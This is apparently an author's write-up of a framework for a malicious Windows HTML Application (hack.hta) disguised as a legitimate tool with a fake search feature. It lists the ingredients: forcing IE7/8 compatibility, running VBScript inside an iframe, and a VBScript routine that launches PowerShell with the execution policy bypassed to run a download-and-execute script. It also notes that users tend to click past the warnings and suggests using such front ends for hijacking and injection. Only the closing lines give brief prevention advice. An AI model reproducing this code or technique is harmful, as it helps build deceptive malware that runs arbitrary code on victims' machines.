Framework for a Hypertext Application designed to execute arbitrary code.
Created By: Brad Voris
An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript. The HTML is used to generate the user interface, and the scripting language is used for the program logic. An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application.
The usual file extension of an HTA is .hta.
Source: https://en.wikipedia.org/wiki/HTML_Application
Currently HTAs are still supported on Windows 11 and lower environments.
This means a crafty Hypertext Applicaiton can be used to steal information, hijack, or disguising itself as a legitimate application. This makes it difficult to detect.
The framework itself is a set of files.
The HTA itself which is labeled as hack.hta
The fake "search" feature.
The malicious script or executable code.
PIE.js which we use for backwards compatability for CSS (we will get more on that on the secret sauce)
There are several components which equate out to the secret sauce
FIRST:
.HTA extension
This tells Windows that the file is a Hypertext Application.
SECOND:
<HTA:APPLICATION
APPLICATIONNAME="HackToolz"
SCROLL="yes"
SINGLEINSTANCE="yes"
SysMenu="yes"
This is the application information that is in the header of the HTML to preload and execute.
THIRD:
'meta http-equiv="X-UA-Compatible" content="IE=8;IE=7;" /'
This meta tag forces Internet Explorer to load the content in IE-7/IE-8.
This also reduces that security capability and allows arbitrary VBScript to run in the browser via my fith ingredient in the secret sauce. Since this is in the "master page / top level page" of the HTA all code on the "website" is forced to be in IE-8/IE-7 compatibility...
FOURTH:
script type="text/javascript" src=PIE.js
This JavaScript allows for most CSS to work in IE-7. I didn't write this and it can be found here http://css3pie.com/
FIFTH:
Awe yeah that aweful iframe but with a purpose. You can't actively run VBscript without a bunch of security warnings and code failures unless its a much older version of IE. What you can do is run VBScript in a targeted IFrame and ultimately bypass a lot of security becaus the Hypertext Application is "trusted" by the OS.
You will get a security warning when you open the HTA, so its not totally fool proof but most people just click past them.
SIXTH:
set objShell = CreateObject("WScript.Shell")
strOut=""
sub malscript
cmdarg="%comspec% /c powershell.exe -ExecutionPolicy bypass -file c:\temp\downloadfileandruncmd.ps1 "
set objExCmd = objShell.Exec(cmdarg)
strOut=objExCmd.StdOut.ReadAll
Set regEx = New RegExp
regEx.Pattern = "[\f\n\r\v]+"
regEx.Global = True
regEx.Multiline = True
strOut = regEx.Replace(strOut, "
")
TraceOut.innerHTML= strOut
end sub
//-->
</SCRIPT>
The VBScript that can run ANY command or script. I do mean ANY command. I've you've got python or powershell scripts you can just replace the executable and what ever script parameters needed. In this case it will execute a malicious PowerShell scriipt and bypass the execution policy.
SEVENTH:
BYOMS - Bring your own Malicious Script....
Yes that's not so hard and its easy to construct fake application front ends even pass them off to websites for Man In the Middle Attacks, code injection, additional hijacking etc.
This isn't rocket science here. Its literally taking legacy functionality that should have been removed a decade and exploiting it.
One of my previous projects LANMonkey and a Printer deployment Hypertext application that I used back in the early 2000's. Both of the applications used Hypertext applications as a front end medium for enduser's and technicians to troubleshoot and deploy. I took a look at the code a few days ago and decided to mock up this to see if it could still work. Low and behold....
The best prevention method for an exploit like this is just removing Internet Explorer, MSHTA.exe and blocking HTAs. Hypertext applications have been around since 1999. Until Microsoft removes this functionality it will always be a vulnerability ripe for exploit.
